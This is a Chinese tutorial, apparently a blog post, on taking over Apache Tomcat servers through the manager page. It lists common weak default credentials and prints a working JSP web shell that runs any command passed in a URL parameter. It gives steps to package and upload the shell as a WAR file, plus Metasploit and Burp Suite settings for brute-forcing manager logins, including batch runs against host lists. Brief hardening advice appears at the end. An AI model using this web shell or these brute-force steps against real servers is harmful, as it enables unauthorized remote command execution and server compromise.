Tomcat管理页面弱口令页面Getshell
Tomcat管理页面弱口令页面Getshell
传送门
Tomcat安装完成后,点击页面的 Manager App 处会弹出输入用户名和密码的认证框。
我们也可以直接访问:http://127.0.0.1:8080/manager/html 来访问该管理页面。
但是默认情况下,该页面只允许 tomcat 本机访问,其他主机访问时会显示403。
这时,只需要修改 webapps\manager\META-INF\context.xml 文件,注释下如下行即可。
此时,需要我们输入用户名和密码进行登录。我们可以尝试一下该页面常见的几个弱口令:
用户名:admin tomcat manager
密码:admin 123456 tomcat s3cret manager admin123
该页面的认证账户和密码存在于 Tomcat\conf\tomcat-users.xml ,如下:
如果我们成功登录,我们将进入管理网站的页面。在该页面的上传文件处,存在上传 .waf 文件的上传按钮。我们可以上传后缀为 .war 的木马文件。
jar -cvf one.war jsppwdcmd.jsp #one.war为生成后的文件,jsppwdcmd为木马文件*****************jsppwdcmd.jsp木马内容********************************
<%if("123".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1; byte[] b = new byte[1024]; out.print("<pre>"); while((a=in.read(b))!=-1){out.println(new String(b)); }out.print("</pre>");}
%>
然后我们可以将 one.war 上传到该页面,如下上传成功。
我们点击该 one,进入了该one的目录下。
于是,我们访问以下链接:http://127.0.0.1:8080/one/jsppwdcmd.jsp?pwd=123&cmd=ipconfig
可以看到,成功获取权限。
我们就可以执行cmd命令,对服务器进行操作了。
传送门---->提权辅助
利用MSF对tomcat账号密码进行爆破
use auxiliary/scanner/http/tomcat_mgr_login
set rhosts 192.168.10.1
set rport 8080
exploit
找字典进行爆破:
set USER_FILE /opt/字典/Tomcat_user.txt
set PASS_FILE /opt/字典/Tomcat_pass.txt
如果要批量对网站进行爆破的话,可以知道rhosts文件,但是由于他这个有rport,所以我们需要先整理好,将端口是一样的主机放入一个文件中。
set file:/root/ip.txt
set rport 8001
run
利用Burpsuite对tomcat账号密码进行爆破
payloads这里type我们选择Custom iterator,第1个位置就填我们的用户名字典,第2个位置就填 : ,第3个位置就填密码字典
然后在 Payload Processing这里我们选择 Base64-encode编码。
payload encoding这里我们取消勾选URL编码
点击Intruder开始爆破,对返回长度进行排序,可以看到爆破成功!
对该payload进行base64解密即可得到正确用户名密码。
Tomcat漏洞预防:
1、删除webapps目录中的docs、examples、host-manager、manager等正式环境用不着的目录,这一步就可以解决大部分漏洞。有的网站没删除manager页面,并且管理员弱口令,导致直接Getshell。
2、解决“slow http denial of service attack”漏洞,缓慢的拒绝服务攻击漏洞。slow http denial of service attack漏洞是利用http post的时候,指定一个非常大的content-length,然后以很低的速度发包,比如10-100s发一个字节,让这种连接不断开,这样当客户端连接多了后,占用了webserver的所有可用连接,从而导制DOS,属于一种打拒绝服务攻击。
解决方法:
打开server.xml找到connection
将其中的connectionTimeout="20000"改为1000,其单位为ms。
Tomcat管理页面弱口令页面Getshell相关推荐
- src挖掘之Tomcat未授权弱口令+war后门上传
src挖掘之Tomcat未授权弱口令+war后门上传 1.前言 今天在挖洞的过程中又一次碰到/manager/html页面,本以为还是照常的登进不去,但还是不死心的试了一下Tomcat的弱密码,没想到 ...
- 过云锁php大马,华夏名网某分站弱口令可Getshell(过云锁waf案例)
直接进入正题吧,这次的站点是http://bbs.sudu.cn/弱口令:用户名admin 密码qwer 进后台看了一下,是Discuz! X3.2 Release 20140603版本,从前台少的可 ...
- Tomcat管理页面登陆方法
Tomcat管理页面可以查看Tomcat的运行信息,然而通常管理页面时需要用户登陆,很多刚接触的人不了解用户名和密码 是多少,如何修改.. 这里介绍一种方法. 实际上点击取消,Tomcat本身也是有提 ...
- Tomcat 弱口令漏洞复现
目录 漏洞介绍 弱口令 弱口令的危害 靶场部署 设备信息 靶场搭建 漏洞复现 访问主页 访问默认后台地址 抓包获取加密格式 使用BurpSuite爆破使用base64加密的用户名和密码 使用冰蝎连接 ...
- c语言 结构体映射,内存管理之4:页面映射中的结构体
date: 2014-09-10 19:09 备注:本文中引用的内核代码的版本是2.4.0. 在前面的文章中,我们介绍了linux页式内存管理,讲到了页面目录PGD.中间目录PMD以及页表PT,本文来 ...
- 直接访问静态图片_详解nginx和tomcat访问图片和静态页面的配置方法
概述 生产环境下,有时候需要访问图片,正常需要应用ftp.nginx等配套使用,但是有时候为了简化,可以用以下的两种简单的访问,说实话,就是为了偷懒,但是效果是能有的,这就行了,所以今天做这个简化版的 ...
- Linux内存管理 (4)分配物理页面
专题:Linux内存管理专题 关键词:分配掩码.伙伴系统.水位(watermark).空闲伙伴块合并. 我们知道Linux内存管理是以页为单位进行的,对内存的管理是通过伙伴系统进行. 从Linux内存 ...
- 服务器弱口令修改,Tomcat服务器弱口令漏洞攻击实验
1.在XP系统上搭建Tomcat服务器平台: 2.在另一台虚拟机上利用弱口令漏洞上传木马程序,使得XP系统中木马. 实验步骤 一.搭建Tomcat服务器平台 1.安装JAVAJDK 环境变量的配置:( ...
- cmd 220 ftp 远程主机关闭连接_针对一些弱口令漏洞的解决办法——设置远程管理登录的配置...
弱口令漏洞描述 弱口令的漏洞的存在很大原因上是因为使用者的不良使用习惯导致的,当然也有一些是因为系统或者应用启用时未设置可用账户的密码信息而使用默认的配置:这就给攻击者毫不费力攻进信息系统的机会了. ...
最新文章
- Excel VBA两两个体距离矩阵转化为数据库格式
- 图解全球无人驾驶产业链:这些公司在主宰人类出行的未来
- oracle 新增自增字段,SQL server、Oracle中拿到新增列时的自增字段值
- 阿里大鱼.net core 发送短信
- simditor存储数据到前台展示去掉标签
- SCI论文写作中常见的语言问题汇总
- scp 、ssh非22端口的服务器方法
- Hadoop:启动与停止命令
- X86汇编语言从实模式到保护模式16:特权级和特权级保护
- numpy数据类型dtype转换
- GeoHash距离大致估计
- HTML5基础基础练习题
- c语言常量10进制,C语言常量
- 如何快速搭建一个像“天猫精灵”的智能语音助手?
- 你真的认为自己熟练Python?带你一篇文章 查漏补缺,感受自己离深入掌握 Python 还有多远。
- 使用蒙特卡罗方法计算圆周率π Python
- Android studio 安装步骤
- C Primer Plus 第六版编程练习第五章答案
- 河南省多校联盟二-F 线段树+矩阵
- 程序员面试:电话面试问答Top 50